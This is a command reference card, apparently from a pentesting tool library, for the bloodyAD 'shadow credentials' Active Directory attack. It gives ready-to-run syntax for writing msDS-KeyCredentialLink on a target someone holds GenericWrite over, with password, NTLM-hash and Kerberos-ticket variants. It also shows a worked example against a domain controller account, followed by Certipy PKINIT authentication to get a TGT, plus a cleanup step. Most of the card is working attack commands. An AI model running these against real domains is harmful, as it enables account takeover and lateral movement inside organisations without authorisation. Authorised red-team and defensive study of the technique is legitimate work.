bloodyAD Shadow Credentials

Add a Key Credential (msDS-KeyCredentialLink) to a target object you have GenericWrite over. After this you can request a TGT for the target via PKINIT (Certipy auth -pfx) and pivot through the account. Cleaner replacement for Whisker.

Tool
bloodyAD
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

bloodyAD --host <dc-ip> -d <domain> -u <user> -p <password> add shadowCredentials <target>

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

bloodyAD --host <dc-ip> -d <domain> -u <user> -p :<hash> add shadowCredentials <target>

Kerberos Ticket requires Kerberos ticket

KRB5CCNAME=<ccache> bloodyAD --host <dc-fqdn> -d <domain> -u <user> -k add shadowCredentials <target>

Cleanup requires password

bloodyAD --host <dc-ip> -d <domain> -u <user> -p <password> remove shadowCredentials <target>

Examples

bloodyAD --host 10.10.10.10 -d corp.local -u jdoe -p 'Password123!' add shadowCredentials 'DC01$'
certipy auth -pfx <generated.pfx> -dc-ip 10.10.10.10

Tags

bloodyad shadow-credentials kcd pkinit msds-keycredentiallink acl-abuse

References